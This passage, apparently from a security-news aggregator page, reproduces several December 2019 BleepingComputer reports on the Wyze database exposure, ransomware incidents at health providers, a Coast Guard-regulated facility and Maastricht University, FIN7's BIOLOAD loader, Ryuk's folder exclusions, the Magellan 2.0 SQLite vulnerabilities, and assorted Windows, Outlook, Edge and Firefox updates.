@WyzeCam
Replying to @WyzeCam
Everyone should be required to login to their Wyze app again due to a security precaution taken this afternoon. You can learn more here: https://forums.wyzecam.com/t/alleged-data-breach-12-26-2019/79046 …

44
7:53 AM - Dec 27, 2019
Twitter Ads info and privacy
41 people are talking about this
Improperly secured database
The unsecured data was a copy of the company's production database containing a subset of all its users' info and it was created by Wyze to "measure basic business metrics like device activations, failed connection rates" by querying the number of connected devices, connectivity errors, and more.

"Queries such as these are expensive in terms of computer resources and they would have impacted your product experience significantly," Song explained. "For that reason, we created a separate database specifically for processing those heavier requests."

While the exposed database was initially properly configured to protect Wyze's customers, an employee mistakenly removed the security protocols while using it on December 4th.

"We locked down the database in question before we were able to verify it was exposed," Song added. "We did this as a precaution because the published article referenced a database connected to 'Elasticsearch': a search tool that we also used on our query database."

The information that Wyze had an exposed Elasticsearch cluster was also confirmed by Security Discovery researcher Bob Diachenko who said that the connected database contained 1,807,201,457 records including log data, API requests, and events.

Bob Diachenko
@MayhemDayOne
As per my records, Wyze had huge Elasticsearch cluster publicly exposed. It included 1,807,201,457 records: log data, API requests and events. https://forums.wyzecam.com/t/updated-12-27-19-data-leak-12-26-2019/79046 …

[Updated 12-27-19] Data leak 12-26-2019
12-27-19 update On December 26th at around 10:00 AM, we received a report of a data leak. We immediately restricted database access and began an investigation. Today, we are confirming that some Wyze...

forums.wyzecam.com
29
12:21 AM - Dec 29, 2019
Twitter Ads info and privacy
17 people are talking about this
Exposed Wyze user information
The Wyze CPO confirmed some of the info related to the exposed information published by Twelve Security's December 26 report.

He stated that the unsecured database did contain customer emails and camera nicknames, WiFi SSIDs, Wyze device info, roughly 24,000 tokens associated with Alexa integrations, as well as body metrics including height, weight, gender, and other health info for a small number of product beta testers.

Wyze had the health info of 140 external beta testers stored within the exposed database as part of a limited new hardware beta test.

However, Song added that the database "did not contain user passwords or government-regulated personal or financial information," contradicting the info provided by Twelve Security in its report.

Additionally, Wyze's co-founder also said that "there is no evidence that API tokens for iOS and Android were exposed, but we decided to refresh them as we started our investigation as a precautionary measure."

Wyze
@WyzeCam
· Dec 27, 2019
Replying to @WyzeCam
**12/26/19 9:00 PM PT** - We apologize for the delay and appreciate your patience with the difficulty using two-factor authentication. Adjustments to our 2FA service have been made and people running into the invalid phone number error should be able to log into the Wyze app

Wyze
@WyzeCam
now. If you are still having trouble logging into your app, please contact our customer support team.https://support.wyzecam.com/hc/en-us/requests/new …

14
6:32 AM - Dec 27, 2019
Twitter Ads info and privacy
See Wyze's other Tweets
Regarding the impact of this security incident, Wyze advises its customers to be wary of future phishing attempts since one ore more third-parties could have their email addresses.

As a precautionary measure Wyze logged out all users by pushing a token refresh and "added another level of protection to our system databases (adjusted several permission rules and added a precaution to only allow certain whitelisted IPs access databases)."

As a direct result of these measures, all Wyze customers will have to log back in the next time they need to access their accounts and relink their Alexa, Google Assistant, or IFTTT integrations.


Microsoft Outlook for the Web to Support Sending Email As Alias
29.12.2019 
Bleepingcomputer  IT

Microsoft is working on adding support to the Outlook on the web browser-based client for sending emails via alias email addresses (also known as aliases or proxy addresses).

After the feature's release, Office 365 customers will be able to send messages via Outlook on the web using any previously set up alias besides their primary SMTP address.

Email sender aliases support will prove useful for users who need to send emails from multiple branded domain names or on behalf of a specific company team or department.

Having the choice to choose any alias available for their account will also remove the hassle of setting up shared Office 365 mailboxes or creating additional POP or IMAP accounts.

Outlook on the web
Outlook on the web (Microsoft)
"So to kick-off our journey to provide you and your users with the flexibility to send email using an alias, we're excited to announce that soon Outlook on the web (aka OWA) will natively support the ability to choose the sender or FROM from a drop-down list right within the compose pane," says the planned feature's Microsoft 365 roadmap entry.

"And when the recipient receives that message, the FROM and REPLY TO will show that alias, regardless where the recipient's mailbox happens to live."

This new feature designed to allow Office 365 customers to send email from proxy addresses (aliases) from Outlook on the web is currently under development, with Microsoft planning to make it generally available in all Exchange environments during Q4 2020.

Additional Office 365 email improvements
In related news, Microsoft is working on adding the highly popular Outlook for Windows Message Recall feature to the Exchange Online hosted cloud email service for businesses.

Once it will roll out to all Office 365 environments during Q4 2020, the Message Recall feature will make it possible for users of Microsoft's cloud email to retrieve emails not yet opened by the recipients, regardless of the email client they use.

Redmond is also planning to add protection against Reply-All email storms in Exchange Online sometime during Q3 2020, an issue impacting Office 365 members of improperly locked down email distribution lists.

Reply-All storms (aka reply-allpocalypses) are huge chain reaction email sequences usually started by one of the members of a large email list who replies to the entire list using the "Reply All" feature. This can lead to accidental Distributed Denial of Service (DDoS) incidents that could take down some of the email servers used to deliver the numerous replies.

Another feature dubbed 'Unverified Sender' designed to help Office 365 users identify potential spam or phishing emails that reached their Outlook inbox is also currently under development.

Last but not least, Microsoft is currently enhancing the way emails sent using the Office 365 Message Encryption (OME) service are seen by mail servers with the end goal of making them a lot less likely to be marked as spam and automatically sent to the Trash folder.


Criminals Pull Hard Before Xmas, Attack U.S. Health Industry
29.12.2019 
Bleepingcomputer  Attack

Attackers are taking no breaks and actually pull harder before holidays, as shown by a San Antonio mental health services provider and a New Mexico hospital impacted by malware attacks according to reports and disclosures published before Christmas.

San Antonio's The Center for Health Care Services (CHSC) shut down computing systems for all its clinics in response to a larger-scale cyber-attack that took place last week.

Roosevelt General Hospital (RGH), the other healthcare organization affected, disclosed that it discovered malware on one of its digital imaging servers containing patient info, on November 14.

Mental health provider takes down systems
The CHSC provides various mental health services to adults and children with "mental health conditions, substance use challenges and intellectual or developmental disabilities" from San Antonio, Texas.

As CEO Jelynne LeBlanc Burley told the San Antonio Express News, the incident that led to CHSC having to shut down computing systems in all its clinics is currently investigated by both the U.S. Federal Bureau of Investigation (FBI) and the Secret Service seeing that it's part of a series of attacks targeting multiple organizations.

The infection was isolated to a single system by CHSC's IT team after law enforcement agents alerted them of the attack last week.

"Now we’re in the process of bringing back our system," Burley said at the time. "We started at our larger clinics, and we’re bringing it up slowly and carefully to ensure that our security is still intact."

Patients encouraged to monitor credit reports
New Mexico's RGH issued a security incident notice on December 23 to disclose a malware infection that affected one of its radiology servers last month, on November 14.

According to the notification, 500 medical records including "names, addresses, date of birth, driver’s license numbers, Social Security numbers, phone numbers, insurance information, medical information and gender" were exposed in the incident.

"Although it is not been confirmed that the compromise of any data actually occurred, RGH is alerting potentially affected patients and offering assistance in monitoring their information," the alert adds.

Right after the malware was detected, the hospital's IT experts secured and restored the impacted server, while also making sure that all patient info was recovered.

Although we are continuing our investigation, there is no evidence at this time that any patient data has been wrongfully used. The malware identified on the radiology server was contained and terminated immediately upon detection. This breach did not affect our electronic health record system or billing system. - Kaye Green, CEO

"With security events such as this one, time was taken to thoroughly investigate what occurred and identify individuals who have been affected," RGH Marketing and Public Relations Director Jeanette Orrantia said.

"Since then, the server has been secured and patient information has been restored. Health and Human Services was notified within the 60-day reporting timeframe."

RGH also recommends all patients that received a security incident notification from the hospital to proactively monitor their credit reports for potential fraud attempts.

Tens of thousands affected by breaches in December
Colorado Department of Human Services, Sinai Health System, Cheyenne Regional Medical Center, Children's Hope Alliance, and RiverKids Pediatric Home Health are a handful of the total number of healthcare providers impacted by data breaches just during December.

Just in these five incidents, the protected health information (PHI) of tens of thousands of individuals was exposed per reports filed with the U.S. Department of Health and Human Services Office for Civil Rights.

According to Emsisoft's 2019 ransomware report, 759 healthcare providers were impacted only by ransomware attacks during 2019, leading to serious consequences:

• Emergency patients had to be redirected to other hospitals.
• Medical records were inaccessible and, in some cases, permanently lost.
• Surgical procedures were canceled, tests were postponed and admissions halted.
As proof of how easy it easy to infiltrate and/or hack into health industry entities' systems, using the ꓘamerka Internet of Things/Industrial Control Systems reconnaissance tool one can easily get an interactive map of exposed healthcare devices.

Once an attacker gains access to one system within a healthcare provider's network, this could lead to severe consequences including data breaches, ransomware infections, and even people having their lives endangered.


U.S. Coast Guard Says Ryuk Ransomware Took Down Maritime Facility
29.12.2019 
Bleepingcomputer  Ransomware

The U.S. Coast Guard (USCG) published a marine safety alert to inform of a Ryuk Ransomware attack that took down the entire corporate IT network of a Maritime Transportation Security Act (MTSA) regulated facility.

While the incident is still currently being investigated, the USCG says that a phishing email is most likely the point of entry within the MTSA facility's network.

"Once the embedded malicious link in the email was clicked by an employee, the ransomware allowed for a threat actor to access significant enterprise Information Technology (IT) network files, and encrypt them, preventing the facility’s access to critical files," says the USCG.

The USCG issued another safety alert in July with cybersecurity guidance after a cyber incident experienced by a deep draft vessel during February affected the ship's entire network.

Just as it happened in the July alert, the UCSC once again reminds maritime stakeholders to closely check the validity of the email sender before replying to or opening unsolicited emails.

Operations shut down for over 30 hours
Even though the Marine Safety Information Bulletin (MSIB) doesn't mention the type of facility or its name, it's safe to assume that it must be a port seeing that the ransomware managed to infiltrate cargo transfer industrial control systems.

"The virus further burrowed into the industrial control systems that monitor and control cargo transfer and encrypted files critical to process operations," adds the USCG.

The systems encrypted by Ryuk Ransomware directly impacted the facility's "entire corporate IT network (beyond the footprint of the facility)" [emphasis ours] and physical access and camera control systems, and it also led to "loss of critical process control monitoring systems."

On the whole, the attack forced the company to completely shut down operations for more than 30 hours during the cyber-incident response phase.

The Coast Guard recommends facilities utilize the National Institute of Standards and Technology (NIST) Cybersecurity Framework (CSF) and NIST Special Publication 800-82 when implementing a Cyber Risk Management Program. - USCG

Ransomware and breach mitigation measures
The USCG provides the following measures to limit future MTSA facility breaches and reduce recovery times:

• Intrusion Detection and Intrusion Prevention Systems to monitor real-time network traffic
• Industry-standard and up to date virus detection software
• Centralized and monitored host and server logging
• Network segmentation to prevent IT systems from accessing the Operational Technology (OT) environment
• Up-to-date IT/OT network diagrams
• Consistent backups of all critical files and software
UK's National Cyber Security Centre also published an advisory in June detailing Ryuk Ransomware campaigns targeting organizations around the globe including guidance on how to protect against ransomware attacks.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued its own advisory on how to prevent and respond to ransomware infections, as well as advice on what to do after a ransomware infection.

To make matters worse for individuals and organizations affected by a Ryuk Ransomware attack, it has recently been discovered that this strain's decryptor has a bug that could lead to data loss in large files.

Therefore, Ryuk victims should always consider backing up all of their encrypted data before decryption, to protect it if the decryptor corrupts it.


Ransomware Hits Maastricht University, All Systems Taken Down
29.12.2019 
Bleepingcomputer  Ransomware

Maastricht University (UM) announced that almost all of its Windows systems have been encrypted by ransomware following a cyber-attack that took place on Monday, December 23.

UM is a university from the Netherlands with over 18,000 students, 4,400 employees, and 70,000 alumni, UM being placed in the top 500 universities in the world by five ranking tables in the last two years.

"Maastricht University (UM) has been hit by a serious cyber attack," the university announced on Christmas Eve, December 24.

"Almost all Windows systems have been affected and it is particularly difficult to use e-mail services. UM is currently working on a solution."

It is currently unknown if scientific data was also accessed or exfiltrated by the attackers during the attack, prior to the systems getting encrypted with the yet unnamed ransomware strain.

Extra security measures have been taken to protect (scientific) data. UM is investigating if the cyber attackers have had access to this data. - UM

All systems shut down temporarily
In an update published today, UM says that all the university's systems have been taken down as a precautionary measure during investigations.

"In order to work as safely as possible, UM has temporarily taken all of its systems offline," the update says. "Everything is aimed at giving students and employees access to the systems as soon as possible, possibly in phases."

However, seeing that the attack affected a vast majority of UM's computing systems, the amount of time needed to restore all the impacted computers is not yet possible to estimate.

"For the same reason, it is not possible to state with absolute certainty, which systems have been affected and which have not," UM adds. "This requires additional investigation."

The Executive Board and the deans of the faculties deeply regret the inconvenience this is causing for both students and staff. In the days to come, they want to see in what way students and staff who are experiencing problems due to this situation can be accommodated. - UM

At this time, UM's IT staff and external security specialists are working on repairing the affected systems and are also running a forensic investigation of the cyber-attack. The attack has also been reported to law enforcement as required by regulations in the Netherlands.

According to UM, the main focus right now is to make sure that the university's systems will be protected in the event of a future attack.

UM also says that employees and students can reach out to the ICT Servicedesk with questions related to the attack by sending an e-mail at info@m-u.nl using their private e-mails or by calling 043 38 85 101 today during office hours.

BleepingComputer asked Maastricht University for comment and for extra details regarding the ransomware attack but did not hear back at the time of publication.


FIN7 Hackers' BIOLOAD Malware Drops Fresher Carbanak Backdoor
29.12.2019 
Bleepingcomputer  CyberCrime  Virus

Malware researchers have uncovered a new tool used by the financially-motivated cybercriminal group known as FIN7 to load fresher builds of the Carbanak backdoor.

Dubbed BIOLOAD, the malware loader has a low detection rate and shares similarities with BOOSTWRITE, another loader recently identified to be part of FIN7's arsenal.

Abusing legitimate Windows methods
The malware relies on a technique called binary planting that abuses a method used by Windows to search for DLLs required to load into a program. An attacker can thus increase privileges on the system or achieve persistence.

Fortinet's enSilo endpoint security platform blocked malicious payloads in legitimate Windows processes. More precisely, it detected a malicious DLL in FaceFodUninstaller.exe that exists on clean OS installations starting Windows 10 1803.

"What makes this executable even more attractive in the eyes of an attacker is the fact that it is started from a built-in scheduled task named FODCleanupTask, thereby minimizing the footprint on the machine and reducing the chances of detection even further" - Fortinet

The attacker places the malicious WinBio.dll in the "\System32\WinBioPlugIns" folder, which is home of the legitimate DLL 'winbio'.

Fortinet found similarities between BIOLOAD and BOOSTWRITE, an in-memory-only dropper previously analyzed by FireEye. This is characteristic to both of them, just like having an encrypted payload DLL embedded.

Similar to newer FIN7 loader
According to Fortinet's analysis, the BIOLOAD samples were compiled in March and July 2019, while BOOSTWRITE's date is from May.

The researchers also noticed some differences. One is that BIOLOAD does not support multiple payloads; another is the use of XOR to decrypt the payload instead of the ChaCha cipher.

Connecting to a remote server for the decryption key also does not happen with BIOLOAD because it is customized for every victim system and derives the decryption key from its name.

Despite the nine-month compilation date, BIOLOAD’s detection is largely undetected. At the time of writing, only nine out of 68 antivirus engines on VirusTotal scanning platform recognize the WinBio.dll as malicious.

As for the payload dropped on compromised systems, it is a newer version of the Carbanak backdoor, with timestamps from January and April 2019.

A significant change in these samples is that they check for more antivirus solutions running on the infected machines than previous ones, which checked only for Kaspersky, AVG, and TrendMicro.

Based on code similarities, techniques and backdoor used, Fortinet attributes BIOLOAD to the FIN7 cybercrime group. Based on the malware compilation dates and its behavior, the researchers believe that this loader is a precursor of BOOSTWRITE.

The malware identified by the researchers shows that FIN7 is actively developing tools to drop their backdoors. While BIOLOAD was used to load Carbanak on an infected host, the more recent BOOSTWRITE loader was used to also deliver RDFSNIFFER, a remote access tool "to hijack instances of the NCR Aloha Command Center Client application and interact with victim systems via existing legitimate 2FA sessions."


How to Run Classic and Chromium Microsoft Edge Side-by-Side
29.12.2019 
Bleepingcomputer  Security

In January, Microsoft will ship a Windows Update on all versions of Windows 10 to replace the classic Edge with the Chromium-powered Edge browser. The migration happens during a Windows Update and the new Edge hides the old Edge after the update completes.

Microsoft says the update will only hide the browser on Windows 10 and the classic version of the browser won't be removed, at least for now. For businesses and those who need it, there will be a new way to launch classic Edge after the Chromium Edge is installed.

According to Microsoft, you can run both versions of the browser side-by-side but system-wide tweaks are required.

Group Policy

The workaround requires Group Policy Editor and it apparently works only on Windows 10 Pro and Enterprise.

Run Old and Chromium Microsoft Edge side-by-side
Open Start menu or Search, and type Group Policy Editor.
In Group Policy editor, navigate to Computer Configuration.
Under Computer Configuration, navigate to Administrative Templates > Microsoft Edge Update > Applications.
Under Applications, select "Allow Microsoft Edge Side by Side browser experience."
Click Edit policy setting.
Select Enabled.
Click OK.
Users with Windows 10 Home cannot restore the classic Edge because the workaround requires the Group Policy Editor, which isn’t available on Windows 10 Home.


Mozilla Adds Additional DNS-Over-HTTPS Provider to Firefox
28.12.2019 
Bleepingcomputer  Security

Mozilla has added an additional DNS provider to its DNS-Over-HTTPS implementation in Firefox. This gives Firefox users more options as to which DoH provider they use for secure DNS lookups.

When Mozilla announced that they would be testing the DoH implementation solely with Cloudflare DNS servers, users were concerned that using a single provider decreased user's privacy and gave that provider too much data about Firefox's users.

In a blog post, Firefox has announced that they have vetted NextDNS through their Trusted Recursive Resolver Program and that they will be an additional DoH provider that users can select in Firefox. The Trusted Recursive Resolver Program requires DNS providers to adhere to certain security and privacy practices before being approved by Mozilla.

“For most users, it’s very hard to know where their DNS requests go and what the resolver is doing with them.” said Eric Rescorla, Firefox CTO. “Firefox’s Trusted Recursive Resolver program allows Mozilla to negotiate with providers on your behalf and require that they have strong privacy policies before handling your DNS data. We’re excited to have NextDNS partner with us in our work to put people back in control of their data and privacy online.”

NextDNS does not currently appear in the stable version of Firefox 71 or Firefox Beta 72, but does appear as an option in Firefox Nightly 73.

In Firefox Nightly 73, if users go to the Firefox options > General > Settings under Network Settings > Enable DNS over HTTPS, they can now select NextDNS as a DoH provider.

NextDNS as a DoH Provider in Firefox
NextDNS as a DoH Provider in Firefox
Giving users more options and choices is a far better approach than testing with a single provider as it not only offers better privacy to Firefox users but lets them choose who they wish to resolve their DNS requests.

Personally, I prefer Google's approach to DoH, which will attempt to user's DNS provider for DoH first, and if they do not support the protocol, revert back to normal DNS resolution.

This allows the user to continue using their ISP's DNS servers who they already feel comfortable using.


Ryuk Ransomware Stops Encrypting Linux Folders
28.12.2019 
Bleepingcomputer  Ransomware

A new version of the Ryuk Ransomware was released that will purposely avoid encrypting folders commonly seen in *NIX operating systems.

After the City of New Orleans was infected by ransomware, BleepingComputer confirmed that the city was infected by the Ryuk Ransomware using an executable named v2.exe.

After analyzing the v2.exe sample, security researcher Vitali Kremez shared with BleepingComputer an interesting change in the ransomware; it would no longer encrypt folders that are associated with *NIX operating systems.

Blacklist *NIX Folders
The list of Ryuk blacklisted *NIX folders are:

bin
boot
Boot
dev
etc
lib
initrd
sbin
sys
vmlinuz
run
var
At first glance, it seems strange that a Windows malware would blacklist *NIX folders when encrypting files.

Even stranger, Kremez told us that he has been asked numerous times whether there was a Unix variant of Ryuk as data stored in these operating systems have been encrypted in Ryuk attacks.

A Linux/Unix variant of Ryuk does not exist, but Windows 10 does contain a feature called the Windows Subsystem for Linux (WSL) that allows you to install various Linux distributions directly in Windows. These installations utilize folders with the same blacklisted names as listed above.

With the rising popularity of WSL, the Ryuk actors likely encrypted a Windows machine at some point that also affected the *NIX system folders used by WSL. This would have caused these WSL installations to no longer work.

"They definitely have cases affecting WSL environments, which likely led them to blacklist NIX folders as they similarly do with the Windows ones. It is new to me and might explain why Ryuk and how Ryuk affects NIX machines via WSL," Kremez told BleepingComputer.

As the goal of most successful ransomware is to encrypt a victim's data, but not affect the functionality of the operating system, this change makes sense

With these folders being blacklisted, Ryuk eliminates an additional headache that they would need to deal with for a paying customer whose WSL installations are ruined.


New Magellan 2.0 SQLite Vulnerabilities Affect Many Programs
28.12.2019 
Bleepingcomputer  Vulnerebility

New vulnerabilities in the SQLite database engine affect a wide range of applications that utilize it as a component within their software packages.

SQLite is a relational database management system that is used by a wide variety of programs including Google Chrome, Mozilla Firefox, Windows 10, and many other well-known programs.

Almost one year after disclosing the original Magellan 1.0 SQLite vulnerabilities, Tencent Blade Team has disclosed another batch of SQLite vulnerabilities called Magellan 2.0.

Like its predecessor, this vulnerability affects all programs that utilize SQLite as a component in their software and that allows external SQL queries.

"These vulnerabilities were found by Tencent Blade Team and verified to be able to exploit remote code execution in Chromium render process," Tencent disclosed in an advisory. " As a well-known database, SQLite is widely used in all modern mainstream operating systems and softwares, so this vulnerability has a wide range of influence. SQLite and Google had confirmed and fixed these vulnerabilities. We will not disclose any details of the vulnerability at this time, and we are pushing other vendors to fix this vulnerability as soon as possible."

Using these vulnerabilities, Tencent was able to remotely execute commands in Google Chrome as long as WebSQL was enabled in the browser. This is a critical vulnerability as it means remote attackers could potentially use this vulnerability to fully compromise a computer.

"If you are using a software that is using SQLite as component (without the latest patch, which is 13 Dec 2019), and it supports external SQL queries. Or, you are using Chrome that is prior to 79.0.3945.79 with WebSQL enabled, you may be affected. Other devices such as PC/Mobile devices/IoT devices may also be affected, depends on if there's a proper attack surface."

Tencent has not seen any indication that these vulnerabilities have been utilized in the wild and reported them to Google and SQLite on November 16th, 2019.

After reporting the vulnerabilities, they were assigned CVE IDs CVE-2019-13734, CVE-2019-13750, CVE-2019-13751, CVE-2019-13752, CVE-2019-13753 and were fixed in Google Chrome 79.0.3945.79 and in patches applied to SQLite on December 13th, 2019.

All software that utilizes SQLite as an integrated component should install the latest version of the software to remain protected.


Windows 10 2004 Under Development, Here Are the New Features
28.12.2019 
Bleepingcomputer  OS

The Windows 10 version 2004 Feature Update is expected to be released in the Spring of 2020 and it comes with a long list of improvements and new features.

Unlike the November 2019 Update, which was more like a service pack, Windows 10 2004 aims to bring new features and enhancements not seen in previous versions of Windows.

For those who wish to test Windows 10 2004, otherwise known as 20H1, and the various new features, you can join the Windows Insider program and install it now.

Changes in Windows 10 2004
Optional update experience
Starting with Windows 10 20H1, you no longer need to access the Device Manager to manage your drivers and new devices drivers will not be installed automatically.

Instead, new drivers will be detected as 'Optional updates' and will be listed under the 'View optional updates' screen where they can be installed.

This new page can be found under Settings > Update & Security > Windows Update > View optional updates.

Optional Updates screen
Optional Updates screen
Task Manager gets an upgrade!
Windows 10's Task Manager is getting two new features - the first one allows you to see the disk type and the second one lets you monitor the temperature of the graphics card.

GPU temperatures in Task Manager
GPU temperatures in Task Manager
Reduced disk and processor utilization by Windows Search
In the past, many users would disable the Windows Indexer feature used by Windows Search because it used up too much CPU or caused high disk usage.

To prevent this from occurring, Windows 10 will use a new algorithm that detects high disk usage and activity, and if detected, will slow down the Windows Indexer.

"Based on this, we’re introducing an algorithm that detects high disk usage and activity, so it can better identify peak usage times and manage the indexer accordingly. We’re also making changes for developers to prevent searches of certain repositories and project folders to improve disk usage."

Download throttling options for Windows Update
Windows Update allows users to throttle bandwidth usage of Windows Update, but setting download throttling as a percent of available bandwidth isn't enough and some users are unable to reduce the impact on their internet connection.

Windows 10 20H1 introduces a new option that lets you set a specific speed that will be used to throttle Windows Update You can set this for both foreground and background downloads. This option also controls the bandwidth used by Windows 10 app store.

Users can access this option via Settings > Update & Security > Delivery Optimization > Advanced Options.

Passwordless experience
Microsoft is introducing passwordless sign-in for Microsoft accounts to strengthen your device sign-in. This allows Microsoft accounts to use 'modern multifactor authentication' such as Windows Hello, Fingerprint, and a PIN instead of passwords.

New Cortana experience
Windows 10 comes with a new Cortana experience that features a brand-new chat-based UI and it gives you the ability to type to interact with the digital assistant.

New Cortana experience
New Cortana experience
The updated Cortana supports both dark and light themes, Bing answers, Assistant conversations, allows you to open apps, set reminders, alarms, and timers as well. The firm has dropped jokes and other consumer-focused features.

Microsoft has created a less intrusive screen for “Hey Cortana” queries.
New speech and language models introduced.
Significantly improved performance.
Redesigned Network Status page
Microsoft has revamped the Network & Internet landing page in Settings. It offers more information about the network, so you can easily understand the connectivity of your device.

Redesigned network status page
Redesigned network status page
The new Network page displays all available connection interfaces on the Status page and you can now see the data usage on this page as well.

Windows Search improvements
Windows 10 2004 brings improvements to Windows Search that include:

Improved spelling correction for Apps & Settings searches. Microsoft is making significant changes to how Windows Search's built-in spell checker works, so you can find the exact file you're looking for.
Windows search will intelligently understand and correct small typos like “powerpiont” and “exce”.
Windows Search now displays hints to improve Best match results under a 'Related:' line.
Account picture in Windows
You can now update the picture of your account that you use to sign in to Windows 10 quickly and the changes reflect across Windows, apps, and Microsoft sites that you use every day.

This can be done from Windows 10's Your info page with the ‘Create your picture’ option.

Optional Features
Windows 10's Settings > Apps & Features > Optional Features is getting the following new features:

Multi-select: The page finally allows you to select and install multiple optional features at the same time.
More useful information: It displays the installation date of each optional feature.
You can also view the status of your latest installs/uninstalls/cancels right on the main page.
Virtual desktops
You can now rename your Virtual desktops to quickly organize your office and personal work or multiple projects.

Rename Virtual Desktops
Rename Virtual Desktops
New Reset this PC from cloud feature
Windows 10's Reset this PC from Cloud is a new cloud recovery feature that allows users to reset their PC using Windows files downloaded from Microsoft’s servers.

Reset this PC from the cloud
Reset this PC from the cloud
New tablet experience for 2-in-1 convertibles
Windows 10 version 2004 offers a better tablet experience with increased spacing between Taskbar icons, the search box on taskbar collapsed into an icon and File Explorer with a touch-optimized layout.

Windows Sandbox
Windows Sandbox, which was introduced with the May 2019 Update, is getting accessibility improvements in this release. With Windows 10 20H1 Update, Windows Sandbox is getting support for Microphone, audio input devices, and the following two keyboard shortcuts:

Shift + Alt + PrintScreen activates the ease of access dialog for enabling high contrast mode.
Ctrl + alt + break allows entering/exiting fullscreen mode
SwiftKey’s Typing Intelligence
Microsoft recently introduced SwiftKey’s typing intelligence for Windows and Spring 2020 Update adds support for more languages:

Afrikaans (South Africa), Albanian (Albania), Arabic (Saudi Arabia), Armenian (Armenia), Azerbaijani (Azerbaijan), Basque (Spain), Bulgarian (Bulgaria), Catalan (Spain), Croatian (Croatia), Czech (Czech Republic), Danish (Denmark), Dutch (Netherlands), Estonian (Estonia), Finnish (Finland), Galician (Spain), Georgian (Georgia), Greek (Greece), Hausa (Nigeria), Hebrew (Israel), Hindi (India), Hungarian (Hungary), Indonesian (Indonesia), Kazakh (Kazakhstan), Latvian (Latvia), Lithuanian (Lithuania), Macedonian (Macedonia), Malay (Malaysia), Norwegian (Bokmal, Norway), Persian (Iran), Polish (Poland), Romanian (Romania), Serbian (Serbia), Serbian (Serbia), Slovak (Slovakia), Slovenian (Slovenia), Swedish (Sweden), Turkish (Turkey), Ukrainian (Ukraine), Uzbek (Uzbek)
Dictation support
Microsoft is expanding Windows 10's Dictation support to devices using English (Canada), English (UK), English (Australia), English (India), French (France), French (Canada), German (Germany), Italian (Italy), Spanish (Spain), Spanish (Mexico), Portuguese (Brazil), and Chinese (Simplified, China) language.

Dictation

Users can access Windows 10's new and improved Dictation feature with Win + H keyboard shortcut when the focus is set to a text field

Language Settings
Microsoft is updating the Language Settings to make it easier for you to understand the language pack you've enabled for your Windows 10 installation.

This allows you to quickly find out the languages selected as default for Windows apps, display, websites, and as well as the Regional format and Windows Search.


Windows 10 File Explorer Bugs to be Fixed After Holidays
28.12.2019 
Bleepingcomputer  OS

Microsoft is working on fixes for various search-related bugs in File Explorer that were introduced when Windows 10 1909 was released.

With the release of Windows 10 version 1909, Microsoft integrated Windows Search directly into the File Explorer so that results are automatically shown as you perform a search.

File Explorer Search
File Explorer Search
With this new feature, new bugs were also introduced that cause File Explorer to hang, the search box to become blurry, the search field to become unresponsive, and takes away the ability to right-click in the search field.

When users have expressed concern about how long it is taking to resolve these issues, Microsoft's Brandon LeBlanc stated that they will look into the issue. As it is the holidays and this is not a critical issue, it will most likely not be addressed until after the holidays.

Tweet

While this bug does not appear to be a huge priority for Microsoft, developers have been working on a fix.

In the release notes for the Windows 10 Insider build 19013 released in November, Microsoft states that they have fixed the bug making the File Explorer's search box unclickable.

"We fixed an issue where you could get into a state where it wasn’t possible to set focus to File Explorer’s search box in order to type your query."

In the release notes for Windows 10 Insider build 19536 released in December, Microsoft also states that they are making it possible to right-click in the search field to remove entries.

"We’ve updated the new File Explorer search experience to enable you to remove previous searches via an option if you right click the entry in the dropdown."

It is not known when Microsoft will push the fixes out to Windows 10 1909, but hopefully, they will be properly tested in the Insider builds before being pushed out to release versions.


Microsoft Edge Starts Testing a Taskbar Pinning Wizard
28.12.2019 
Bleepingcomputer  IT

Microsoft Edge has started testing a taskbar pinning wizard that helps you pin recommended sites and Microsoft apps to the Windows 10 taskbar.

When browsing a web site, both the classic Microsoft Edge and the new Chromium-based Edge browsers let you pin the site you are visiting on the Windows taskbar.

Microsoft is now testing a new 'Taskbar pinning wizard' in the Microsoft Edge Dev and Canary versions that will open a wizard that walks you through pinning various recommended sites to your taskbar.

To access this wizard, click on the Edge menu, select More Tools, and then click the Launch taskbar pinning wizard option as shown below.

Launch the Taskbar Pinning Wizard
Launch the Taskbar Pinning Wizard
Edge will now open a dialog box where you can select the sites you wish to pin to the taskbar. These sites are currently Facebook, YouTube, Wikipedia, Reddit, and Microsoft News.

Choose sites to pin
Choose sites to pin
When you select a site, Edge will automatically pin it to the taskbar. To unpin a site, you can right-click on the taskbar icon and select Unpin or unselect it in the wizard.

If you click continue, you will be brought to another page where the wizard recommends various Microsoft web apps that you can pin taskbar as well. The current choices are Microsoft Office, Microsoft News, and Bing.

Choose Microsoft apps to pin
Choose Microsoft apps to pin
If you click Continue again, you will be brought to the end of the wizard where you can close it.

For most people, this feature will be fairly useless and users are better off just pinning the sites they use and skipping this wizard altogether.

To me, this wizard appears to be nothing more than a tool to promote Microsoft's sites and other well-known sites that do not need much promotion, to begin with.


Maze Ransomware Releases Files Stolen from City of Pensacola
28.12.2019 
Bleepingcomputer  Ransomware

The actors behind the Maze Ransomware have released 2GB of files that were allegedly stolen from the City of Pensacola during their ransomware attack.

Earlier this month, the City of Pensacola was hit with a ransomware attack that impacted the city's email service, some phone service, and caused them to shut down their computer systems.

It was later confirmed by BleepingComputer that they were attacked by the Maze Ransomware who stated they stole data from the city before encrypting the network. They then demanded a $1 million ransom to decrypt their files.

Yesterday, the Maze actors released 2GB of the 32GB of files that they state they stole from the city before encrypting the network.

Alleged Proofs of Stolen Data
Alleged Proofs of Stolen Data
In a discussion with BleepingComputer, the Maze actors stated that they released the stolen data to prove to the media that they steal more than just a few files during a ransomware attack.

"This the fault of mass media who writes that we don't exfiltrate data more than a few files. We did not want to make a pressure on city, we still dont make it right now. We've shown that our intentions are real."

When BleepingComputer asked if they intended to release the rest of the data, they responded with "It depends".

BleepingComputer has also contacted the City of Pensacola, but have not heard back as of yet.


Entercom Radio Network Hit By Second Cyber Attack This Year
28.12.2019 
Bleepingcomputer  Attack

Giant radio network Entercom has been targeted in a new cyberattack that may have impacted the back-office functions. Some stations were apparently forced to run recorded programs.

This is the second time the network has to recover from a cyber event, the first one hitting in September being a ransomware attack that caused significant financial losses.

Entercom's network has more than 235 radio stations that broadcast news, sports, and music, and it has an audience of over 170 million people every month.

Systems went down, then back up
Details about the latest incident remain private at the moment but the company confirmed the attack and that it caused an outage.

The breach occurred on Sunday and it was not as troublesome as the ransomware attack as the network says that the issues were mostly fixed by Monday morning.

